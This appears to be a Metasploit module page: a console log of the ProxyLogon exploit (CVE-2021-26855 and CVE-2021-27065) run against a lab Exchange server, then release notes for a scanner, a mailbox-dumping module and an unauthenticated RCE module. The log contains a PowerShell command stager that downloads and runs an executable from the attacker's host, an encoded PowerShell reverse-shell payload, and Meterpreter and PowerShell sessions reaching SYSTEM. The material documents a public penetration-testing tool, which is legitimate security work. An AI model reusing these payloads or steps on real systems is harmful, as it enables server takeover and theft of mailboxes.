[*] SID: S-1-5-21-<redacted>-<redacted>-<redacted>-1113 (TestUserDA@adlab.local)
[*] https://<redacted>:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: 8b7eddee-192f-42ee-9a04-2710fd0b7588
[*] msExchEcpCanary: mvv8cTCO3UeLf-PPdPYMZehxebOB79gI5rApeoWHFr2JoXyW2r02nlVSyayEOLNcEVX0l4jSPLo.
[*] OAB id: 4f335561-2d67-4bfd-8ff9-66fcae512133 (OAB (Default Web Site))
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting windows/x64/meterpreter/reverse_tcp payload at <redacted>:443
[*] Using URL: http://0.0.0.0:8080/eY7D8QBOsfm
[*] Local IP: http://<redacted>:8080/eY7D8QBOsfm
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\NnTGIBmx.exe http://<redacted>:8080/eY7D8QBOsfm;%TEMP%\\NnTGIBmx.exe;del %TEMP%\\NnTGIBmx.exe"]
[*] Client <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866) requested /eY7D8QBOsfm
[*] Sending payload to <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866)
[*] Client <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866) requested /eY7D8QBOsfm
[*] Sending payload to <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866)
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 3 opened (<redacted>:4444 -> <redacted>:41143) at 2021-03-23 12:33:05 +0100
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 4 opened (<redacted>:4444 -> <redacted>:41144) at 2021-03-23 12:33:05 +0100
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\MWqc.aspx
[*] Server stopped.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SRV02
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : ADLAB
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > [*] Shutting down Meterpreter...

msf6 exploit(windows/http/exchange_proxylogon_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[-] Handler failed to bind to <redacted>:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/Zy.js.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://<redacted>:443 - Sending mapi request
[*] SID: S-1-5-21-<redacted>-<redacted>-<redacted>-1113 (TestUserDA@adlab.local)
[*] https://<redacted>:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: d916fea4-ee6a-45db-9b07-a0e493f47a41
[*] msExchEcpCanary: T8_IPsZBMECKP2TyTIpOrUT2CASC79gI_0j82qxLYtwtOScv0jFuiv5Txd_8DQJFVeHgbMlW5HM.
[*] OAB id: 121ef40e-fc81-4639-97cf-27b4d093ee26 (OAB (Default Web Site))
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting cmd/windows/powershell_reverse_tcp payload at <redacted>:443
[*] Generated payload: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAF7SWWACA51WbW/bNhD+7l9xcLVaQizCCdoBCZBirpJuAbLWqLzlg2EgtHSOtcikR1JxjCT/vUeJsuQ4QZcJMGyRx+eee+6FfgcjuUY1LwSEcKUyY1DAbAOf6WtcKIEK3sMZv0P4g6t00+mQZWIyKeB3NOEVzpI8Q2Gg89ABerx1AqfwFdfht9k/mBgIx5sVfuVLpEXDyD4q7Wtj9pfGM5zzIjeRwpR2Mp5rgvCMKnBrNVLyfsOeWdB6a6W27Tw1FFd1aJ0HKPdHXPGlX/2exEZl4mbqRXK55CLt767GOk+keLZ4JtcilzwtVwOHqWSCWoMTYCnTIkdL8Dc/gMokm4Nfu4EQ/4XuLBNpNyg3q3Pl2TzTJD9JfkouN/R7yaxqsUxu0Wg2TlaXzmL6gZ79g0wbroz16zyXuy5Fpy27YZLgyhBglQ6/ovL0Gl2Fd6g07jPeQrdS/hLzaOQcdY8P2eGvH9nhMX0+HHf7NhDnvVMpqI1CvrR0K3RGlRaXa0SzIVglqOJni6Xr8tFip3Ue12CvEMSkoKLfsLg29Z3/vjenqsK+/+CNCf0JQq5hsnPmOy6lwQiVyeZZwg3+zfMs5bb0Ip7nM57cToPgBTpsWJiFrVt7aKhfkSZopbDRpImpLdpktjE4mU49+22Lb8DY0YCex18eBk9OVxRpve1PDN4bhiKRqa3sk5NhHF1cBFbrz9bG715Ricq1ruZDvMA8B1UIQdZAShSayrQLB+ChuDuxb8I2+QGtUVK2G4lcrgrTbF6LSK42KrtZGPCjAI4Ghx/hzyxRUsu5gUiqlVSlggyG1qO11KCQHNxhyq7FtXBV6DRhdmih30TXH/SbF3aJ4sYs2nVT93C7cvYK521STQ6mcEmQVhvX/2zL8+1c61NfpDrnyYI4V6CQie18aawa2vbxd8ZywOpoqwlWIwWPF+JO3mJ4fr8ibTXpvUV52m3GNynRG8XQozyXLC5lUmYyYCNuFrTa+9T736lbL7Icfd/Lyh6ojn9HnvpVxfdh0Adv51wAoUAY7OX23NLHdEyhvHZVuQFhTVgZ4rkLuUGhNueWSgvNzalS5joc8LLgWVnRVLBa7iUAwnrkVuBHn94fwiN8K0xYoYKTYgfqCEpBamAS+ScpgF4Dcm+JeKiUVJPBdMdZi3W5z5IcufKDlxictl+o8e87+530n8qngflp67RLZa9x6jNf8kIvtrewG4PuUolyqdHF09yLsZGr+jKkfxKd7T+IbXLcVQihu3/sAPkBLn++f0UJAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
[*] Powershell session session 5 opened (<redacted>:4444 -> <redacted>:41364) at 2021-03-23 12:35:14 +0100
[!] Tried to delete C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\PnYm.aspx, unknown result
[*] Powershell session session 6 opened (<redacted>:4444 -> <redacted>:41365) at 2021-03-23 12:35:35 +0100

indows PowerShell running as user SRV02$ on SRV02
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
nt authority\system

[cdelafuente-r7]

Original Release Notes

This adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:

• A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as CVE-2021-26855.
• An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as CVE-2021-26855.
• An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user. This module leverages the same SSRF vulnerability identified as CVE-2021-26855 and also a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.

[pbarry-r7]

Release Notes

New module auxiliary/scanner/http/exchange_proxylogon checks if a Microsoft Exchange Server target is vulnerable to a Server-Side Request Forgery (SSRF) identified as CVE-2021-26855.

New module auxiliary/gather/exchange_proxylogon_collector dumps, for a given email address, the mailboxes on vulnerable Microsoft Exchange Server targets, including emails, attachments, and contact information. This module leverages the same SSRF vulnerability identified as CVE-2021-26855.

New module exploits/windows/http/exchange_proxylogon_rce achieves an unauthenticated Remote Code Execution on vulnerable Microsoft Exchange Server targets, allowing for execution of arbitrary commands as the SYSTEM user. This module leverages the same SSRF vulnerability identified as CVE-2021-26855 and also a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.